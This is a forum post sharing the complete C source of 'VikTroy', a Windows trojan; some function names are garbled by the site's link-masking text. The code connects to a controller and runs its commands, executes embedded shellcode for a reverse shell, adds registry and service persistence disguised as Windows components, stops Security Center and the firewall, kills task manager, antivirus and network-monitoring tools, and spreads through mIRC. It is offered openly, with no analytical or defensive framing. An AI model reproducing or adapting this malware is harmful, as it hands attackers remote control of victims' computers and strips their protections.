send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Troyano [C]

  • 0 Respuestas
  • 1832 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Mayo 22, 2011, 10:01:56 pm »
Código: C
  1. /*
  2.    Autor: Coded by Rozor\xZR !Sub_Level
  3.    IRC: irc.irc-hispano.org #sub_level
  4.    URL: http://sincontrol.tomahost.org
  5.    Lenguaje: C/C++ Win32
  6.    Name: VikTroy
  7.    Ejecutable: VikTroy.exe
  8.  
  9. */
  10.  
  11. // Mazard Roolz
  12. // www.mazard.info
  13. // http://sincontrol.tomahost.org/dor/virus/vk-troy.c
  14.  
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <string.h>
  18. #include <winsock.h>
  19. #include <stdlib.h>
  20. #include <process.h>
  21. #include <winbase.h>
  22. //#include <sys\types.h>
  23. #include <tlhelp32.h>
  24.  
  25. #define CM_PRUEBA 101
  26. #define CM_SALIR 102
  27.  
  28. #pragma comment(lib, "wsock32.lib")
  29.  
  30.  
  31. // SOCKET PRINCIPAL
  32. SOCKET sck;
  33. char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
  34. char SeCent[] = "net stop \"Security Center\"";
  35. char Shared[] = "net stop \"SharedAccess\"";
  36. char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
  37. char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
  38. char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";
  39.  
  40. LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);
  41.  
  42. // PAYLOAD
  43. unsigned char payload[] =
  44.  
  45. "\x33\xc9\x83\xe9\xb8\xe8"
  46. "\xff\xff\xff\xff"
  47. "\xc0\x5e\x81\x76\x0e\x4a"
  48. "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
  49. "\x73\xf4\xa2\xde\x67\x46"
  50. "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
  51. "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
  52. "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
  53. "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
  54. "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
  55. "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
  56. "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
  57. "\x8b\x15\x73\x67\x69" // w0w
  58. "\x22\xec\x75\x45\x71\x77\x67"
  59. "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
  60. "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
  61. "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
  62. "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
  63. "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
  64. "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
  65. "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
  66. "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
  67. "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
  68. "\x20\x26\xc9\xe8\x1f\x76\x67\x69"
  69. "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
  70. "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
  71. "\xa8\x54\xcb\x46\x9c"  // c0d3d
  72. "\xd8\x48\xb9\x90\x90\x90";
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79. //ListaProcesos
  80. char *proc_list[]={
  81.                  "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
  82.                  "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
  83.              "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
  84.                  "regedit.exe", "reg.exe" };
  85.                        
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94. // Thread Struct
  95.  
  96. typedef struct thread_struct
  97. {
  98.         char name[250];
  99.         HANDLE Thread_Handle;
  100.         int id;
  101. } thread;
  102.  
  103. thread threads[10];
  104.  
  105.  
  106.  
  107.  
  108.  
  109. int Comando(char recibido[130]);
  110. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  111. void Esconder(void);
  112. void Reverse(void);
  113.  
  114.  
  115. DWORD WINAPI pcInfo(LPVOID param);
  116. DWORD WINAPI ownMirc(LPVOID param);
  117. DWORD WINAPI Pong(LPVOID param);
  118. DWORD WINAPI keyLogger(LPVOID param);
  119. DWORD WINAPI revShell(LPVOID param);
  120. DWORD WINAPI Infectar(LPVOID param);
  121. DWORD WINAPI winFuck(LPVOID param);
  122. DWORD WINAPI Happy(LPVOID param);
  123.  
  124.  
  125. int Comando(char recibido[130]);
  126. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  127. void Esconder(void);
  128. void Reverse(void);
  129. /*int main(void);*/
  130. DWORD WINAPI pcInfo(LPVOID param);
  131. DWORD WINAPI ownMirc(LPVOID param);
  132. //DWORD WINAPI Pong(LPVOID param);
  133. DWORD WINAPI revShell(LPVOID param);
  134. DWORD WINAPI SendProcess(LPVOID param);
  135. DWORD WINAPI winFuck(LPVOID param);
  136. DWORD WINAPI Happy(LPVOID param);
  137. DWORD WINAPI CallChat(LPVOID param);
  138.  
  139. /*
  140. int main(int argc, char *argv[])
  141. {
  142.         char bof[25];
  143.         strcpy(bof, argv[1]);
  144.         return 0;
  145. }
  146. */
  147.  
  148.  
  149. // INDEX
  150.  
  151. int main(void)
  152. {
  153.     HANDLE hThread;
  154.         DWORD id;
  155.         WSADATA wsa;
  156.     struct sockaddr_in mysock;
  157.         char recvbuff[130];
  158.         char *hello = "HEllO";
  159.  
  160.         WSAStartup(MAKEWORD(1, 0), &wsa);
  161.         sck = socket(AF_INET, SOCK_STREAM, 0);
  162.         Esconder();
  163.         mysock.sin_family = AF_INET;
  164.         mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
  165.         mysock.sin_port = htons(80);
  166.         You are not allowed to view links. Register or Login(&(mysock.sin_zero), '\0', 8);
  167.         //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
  168.         connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
  169.         send(sck, hello, You are not allowed to view links. Register or Login(hello), 0);
  170.         for(;;)
  171.         {
  172.                  if(recv(sck, recvbuff, 128, 0)>2)
  173.                  {
  174.                       Comando(recvbuff);
  175.                  }
  176.                  Sleep(800);
  177.         }
  178.  
  179.     Sleep(1000);
  180.         WSACleanup();
  181.         You are not allowed to view links. Register or Login("PAUSE");
  182.         return 1;
  183. }
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190. int Comando(char recibido[130])
  191. {
  192.  
  193.         HANDLE hThread;
  194.         DWORD id;
  195.  
  196.         char *pString;
  197.        
  198.         pString = You are not allowed to view links. Register or Login(recibido, '!');
  199.         if(pString==NULL)
  200.         {
  201.                 You are not allowed to view links. Register or Login("error");
  202.                 return -1;
  203.         }
  204.  
  205.         pString++;
  206.        
  207.         if(You are not allowed to view links. Register or Login(pString, "info", 4)==0)
  208.         {
  209.                 hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
  210.                 CrearThread("INFO", hThread, id);
  211.                 Sleep(1000);
  212.         }
  213.  
  214.         if(You are not allowed to view links. Register or Login(pString, "mirc", 4)==0)
  215.         {
  216.                 hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
  217.                 CrearThread("MIRC", hThread, id);
  218.         }
  219.  
  220.         if(You are not allowed to view links. Register or Login(pString, "exit", 4)==0)
  221.         {
  222.                 closesocket(sck);
  223.                 WSACleanup();
  224.                 You are not allowed to view links. Register or Login("taskkill /F /IM viktroy.exe");
  225.         }
  226.  
  227.         if(You are not allowed to view links. Register or Login(pString, "shell", 4)==0)
  228.         {
  229.                 hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
  230.                 CrearThread("SHELL", hThread, id);
  231.         }
  232.  
  233.         if(You are not allowed to view links. Register or Login(pString, "busca", 5)==0)
  234.         {
  235.                 hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
  236.                 CrearThread("SHRC", hThread, id);
  237.         }
  238.  
  239.         if(You are not allowed to view links. Register or Login(pString, "winfuck", 7)==0)
  240.         {
  241.                 hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
  242.                 CrearThread("FUCK", hThread, id);
  243.         }
  244.  
  245.         if(You are not allowed to view links. Register or Login(pString, "showcmd", 7)==0)
  246.         {
  247.                 HWND hWnd;
  248.             hWnd = FindWindow("ConsoleWindowClass", NULL);
  249.             ShowWindow(hWnd, SW_SHOWNORMAL);
  250.         }
  251.  
  252.         if(You are not allowed to view links. Register or Login(pString, "hidecmd", 7)==0)
  253.         {
  254.                 HWND hWnd;
  255.             hWnd = FindWindow("ConsoleWindowClass", NULL);
  256.             ShowWindow(hWnd, SW_HIDE);
  257.         }
  258.  
  259.         if(You are not allowed to view links. Register or Login(pString, "happy", 5)==0)
  260.         {
  261.                 hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
  262.                 CrearThread("HAPPY", hThread, id);
  263.         }
  264.  
  265.         if(You are not allowed to view links. Register or Login(pString, "chat", 4)==0)
  266.         {
  267.                 hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
  268.                 CrearThread("CHAT", hThread, id);
  269.         }
  270.  
  271.         if(You are not allowed to view links. Register or Login(pString, "infectar", 8)==0)
  272.         {
  273.       You are not allowed to view links. Register or Login("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe");
  274.     }
  275.  
  276.  
  277.         return 0;        
  278.  
  279. }
  280.  
  281.  
  282.  
  283. void Reverse(void)
  284. {
  285.           void(*rever)();
  286.           *(int *)&rever = (int)payload;
  287.           rever();
  288.  
  289. }
  290.  
  291.  // Not ShellCode Call
  292. /*      PROCESS_INFORMATION pinfo;
  293.         STARTUPINFO sinfo;
  294.         SOCKET rsck;
  295.         //WSADATA wsadata;
  296.     struct sockaddr_in rSock;
  297.     memset(&sinfo,0,sizeof(sinfo));
  298.         //WSAStartup(MAKEWORD(1, 0), &wsadata);
  299.         rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  300.         rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
  301.         rSock.sin_family = AF_INET;
  302.     bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
  303.         rSock.sin_port = htons(666);
  304.         memset(&(rSock.sin_zero), 0, 8);
  305.        
  306.         connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
  307.         sinfo.cb = sizeof(sinfo);
  308.         sinfo.dwFlags = STARTF_USESTDHANDLES;
  309.         sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
  310.         CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);
  311.  
  312.   */
  313.  
  314.  
  315.  
  316. // ThreadGen
  317. int CrearThread(char *name, HANDLE Thread_Handle, int id)
  318. {
  319.         int c = You are not allowed to view links. Register or Login()%10;
  320.         You are not allowed to view links. Register or Login(threads[c].name,name);
  321.         threads[c].id = id;
  322.         threads[c].Thread_Handle = Thread_Handle;
  323.         return c;
  324. }
  325.  
  326.  
  327. // HIDE
  328. void Esconder(void)
  329. {
  330.         HWND hWnd;
  331.         hWnd = FindWindow("ConsoleWindowClass", NULL);
  332.         ShowWindow(hWnd, SW_HIDE);
  333. }
  334.  
  335.  
  336. // Arquitectura
  337. DWORD WINAPI pcInfo(LPVOID param)
  338. {
  339.         SYSTEM_INFO sysinfo;
  340.     char allinfo[16];
  341.         GetSystemInfo(&sysinfo);
  342.         if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
  343.         {
  344.                 You are not allowed to view links. Register or Login(allinfo, "Soy un INTEL ");
  345.                 if(sysinfo.wProcessorLevel==3)
  346.                 {
  347.                         You are not allowed to view links. Register or Login(allinfo, "!386 ");
  348.                 }
  349.  
  350.                 else if(sysinfo.wProcessorLevel==4)
  351.                 {
  352.                         You are not allowed to view links. Register or Login(allinfo, "!486 ");
  353.                 }
  354.                
  355.                 else if(sysinfo.wProcessorLevel==5)
  356.                 {
  357.                         You are not allowed to view links. Register or Login(allinfo, "Pentium ");
  358.                 }
  359.  
  360.                 else { You are not allowed to view links. Register or Login(allinfo, "unknow "); }
  361.  
  362.         }
  363.  
  364.         else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
  365.         {
  366.                 You are not allowed to view links. Register or Login(allinfo, "Soy un PocketPC ");
  367.                
  368.                 if(sysinfo.wProcessorLevel==1)
  369.                 {
  370.                         You are not allowed to view links. Register or Login(allinfo, "PPC 601 ");
  371.                 }
  372.                
  373.                 else if(sysinfo.wProcessorLevel==3)
  374.                 {
  375.                         You are not allowed to view links. Register or Login(allinfo, "PPC 601 ");
  376.                 }
  377.  
  378.                 else if(sysinfo.wProcessorLevel==20)
  379.                 {
  380.                         You are not allowed to view links. Register or Login(allinfo, "PPC 620 ");
  381.                 }
  382.  
  383.         }
  384.  
  385.         SetComputerName("xZ-Ownk");
  386.     send(sck, allinfo, You are not allowed to view links. Register or Login(allinfo), 0);
  387.         return 0;
  388.  
  389. }
  390.  
  391.  
  392. // Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P
  393.  
  394. DWORD WINAPI ownMirc(LPVOID param)
  395. {
  396.         HWND hWnd;
  397.         char run1[] = "/run VikTroy.exe";
  398.         SetForegroundWindow(hWnd);
  399.     hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
  400.            NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
  401.  
  402.         SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
  403.         SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
  404.         Sleep(1500);
  405.         return 0;
  406. }
  407.  
  408.  
  409. // Pong Conexion Thread
  410.  
  411. /*DWORD WINAPI Pong(LPVOID param)
  412. {
  413.         char *pong="PONG";
  414.         for(;;)
  415.         {
  416.                 Sleep(25000);
  417.                 send(sck, pong, strlen(pong), 0);
  418.         }
  419.  
  420.         return 1;
  421. }
  422. */
  423.  
  424. // Reverse Shell Thread
  425.  
  426. DWORD WINAPI revShell(LPVOID param)
  427. {
  428.  
  429.    
  430.     Reverse();
  431.         return 0;
  432.  
  433. }
  434.  
  435.  
  436. // Tripode
  437.  
  438. DWORD WINAPI SendProcess(LPVOID param)
  439. {
  440.  
  441.         HANDLE hlista;
  442. PROCESSENTRY32 proceso;
  443. char proname[30];
  444. char killer[30];
  445. int ret, i, mok;
  446.    
  447.     mok = 0;
  448.     for(;;)
  449.         {
  450.           ret = 0;
  451.           i = 0;
  452.  
  453.     for(i=0;i<17;i++)
  454.         {
  455.     ZeroMemory(&proceso,sizeof(proceso));
  456.         proceso.dwSize = sizeof(proceso);
  457.         if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */
  458.         {
  459.                 ret = Process32First(hlista,&proceso);
  460.                 while(ret)
  461.                 {
  462.  
  463.                         You are not allowed to view links. Register or Login(proname,"%i %s",proceso.th32ProcessID,proceso.szExeFile);
  464.                         You are not allowed to view links. Register or Login("\n%s",proname);
  465.  
  466.                         if(You are not allowed to view links. Register or Login(proceso.szExeFile, "mirc.exe")==0 && mok==0 )
  467.                         {
  468.                                 send(sck, "\nEncontrado Mirc.exe\n", You are not allowed to view links. Register or Login("\nEncontrado Mirc.exe\n"), 0);
  469.                             mok++;
  470.                         }
  471.  
  472.                         if(You are not allowed to view links. Register or Login(proceso.szExeFile, proc_list[i])==0)
  473.                         {
  474.                                 You are not allowed to view links. Register or Login(killer, "taskkill /F /PID %d", proceso.th32ProcessID);
  475.                                 WinExec(killer, SW_HIDE);
  476.                         }
  477.                        
  478.  
  479.                         ret = Process32Next(hlista,&proceso);
  480.                 }
  481.          
  482.            CloseHandle(hlista);
  483.         }
  484.         }
  485.      Sleep(100);
  486.  
  487. }
  488.  
  489. }
  490.  
  491.  
  492.  
  493.         /*HKEY hKey;
  494.         unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  495.     unsigned char proceso[] = "VikTroy.exe";
  496.        
  497.         RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
  498.         RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
  499.     RegCloseKey(hKey);*/
  500.  
  501.  
  502.  
  503.  
  504. // WINDOWS FUCKEd x"DDDDDDDDDDD
  505.  
  506. DWORD WINAPI winFuck(LPVOID param)
  507. {
  508.  
  509.  
  510.  
  511.         __asm {
  512.                              mov eax, offset SeCent
  513.                                  push eax
  514.                                  call You are not allowed to view links. Register or Login
  515.                                  pop ebx
  516.                                  nop
  517.                                  nop
  518.                                  
  519.                  // Security Center Off
  520.  
  521.                                  mov eax, offset Shared
  522.                                  push eax
  523.                                  call You are not allowed to view links. Register or Login
  524.                                  pop ebx
  525.                                  nop
  526.                                  nop
  527.                  // Shared Off
  528.  
  529.                              mov eax, offset Reg1
  530.                                  push eax
  531.                                  call You are not allowed to view links. Register or Login
  532.                                  pop ebx
  533.                                  nop
  534.                                  nop
  535.                  // Reg1 In
  536.                        
  537.  
  538.                                  mov eax, offset Reg3
  539.                                  push eax
  540.                                  call You are not allowed to view links. Register or Login
  541.                                  pop ebx
  542.                                  nop
  543.                                  nop
  544.  
  545.                                  mov  eax, offset CreateSrv
  546.                                  push eax
  547.                  call You are not allowed to view links. Register or Login
  548.                                  pop ebx
  549.                                  nop
  550.                                  nop
  551.        
  552.                 }// Reg2 In
  553.  
  554.         return 0;
  555.        
  556.  
  557. }
  558.  
  559.  
  560.  
  561. // Funcion Feliz
  562.  
  563. DWORD WINAPI Happy(LPVOID param)
  564. {
  565.         int a = 0;
  566.     char *Texto = " VikTroy: Simple Trojan Horse   \n"
  567.                           " http://sincontrol.tomahost.org \n"
  568.                                   " Gm Vk Tj Pp                    \n"
  569.                                   " irc-hispano.org #sub_level     \n"
  570.                                   " by xZR !Sub_Level Security     \n";
  571.  
  572.         a = MessageBox(NULL,
  573.                       Texto,
  574.                           "by xZR !Sub_Level",
  575.                           MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  576.    for(;;)
  577.    {
  578.         if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
  579.                 {
  580.            a= MessageBox(NULL,
  581.                                 Texto,
  582.                                    "by xZR !Sub_Level",
  583.                         MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  584.         }
  585.  
  586.   }
  587.  
  588.   return -1;
  589. }
  590.  
  591.  
  592.  
  593. // Not Avaible
  594.  
  595. DWORD WINAPI CallChat(LPVOID param)
  596. {
  597.         HINSTANCE hInstance, hPrevInstance;
  598.         LPSTR CmdLine;
  599.         int uCmd;
  600.         HWND hWnd;
  601.         MSG uMsg;
  602.         WNDCLASSEX wincl;
  603.         SOCKET chatsock;
  604.     struct sockaddr_in chsock;
  605.  
  606.         wincl.cbClsExtra = 0;
  607.         wincl.cbWndExtra = 0;
  608.         wincl.cbSize = sizeof(WNDCLASSEX);
  609.         wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
  610.         wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
  611.         wincl.hIcon = LoadIcon(NULL, "icono.ico");
  612.         wincl.hIconSm = LoadIcon(NULL, "icono.ico");
  613.         wincl.hInstance = hInstance;
  614.         wincl.lpfnWndProc = WindowProc;
  615.         wincl.lpszClassName = "VentanaChat";
  616.         wincl.lpszMenuName = NULL;
  617.         wincl.style = CS_DBLCLKS;
  618.  
  619.         RegisterClassEx(&wincl);
  620.  
  621.         hWnd = CreateWindowEx(             0,
  622.                                    "VentanaChat",
  623.                                                   "Viktroy Talk",
  624.                                                    WS_OVERLAPPEDWINDOW,
  625.                                                    CW_USEDEFAULT,
  626.                                                    CW_USEDEFAULT,
  627.                                                    CW_USEDEFAULT,
  628.                                                    CW_USEDEFAULT,
  629.                                                     HWND_DESKTOP,
  630.                                                 NULL,
  631.                                                            hInstance,
  632.                                                                         NULL);
  633.  
  634.         ShowWindow(hWnd, SW_SHOWDEFAULT);
  635.  
  636.         while(TRUE == GetMessage(&uMsg, 0, 0, 0))
  637.         {
  638.                 TranslateMessage(&uMsg);       
  639.                         DispatchMessage(&uMsg);
  640.         }
  641.        
  642.         return uMsg.wParam;
  643.        
  644.  
  645. }
  646.  
  647.  
  648. LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
  649. {
  650.         switch(uMsg)
  651.         {
  652.         case WM_DESTROY:
  653.                 PostQuitMessage(0);
  654.                 break;
  655.         default:
  656.                 return DefWindowProc(hWnd, uMsg, wParam, lParam);
  657.         }
  658.  
  659.         return 0;
  660. }
« Última modificación: Febrero 08, 2014, 05:48:37 pm por Expermicid »


 

¿Te gustó el post? COMPARTILO!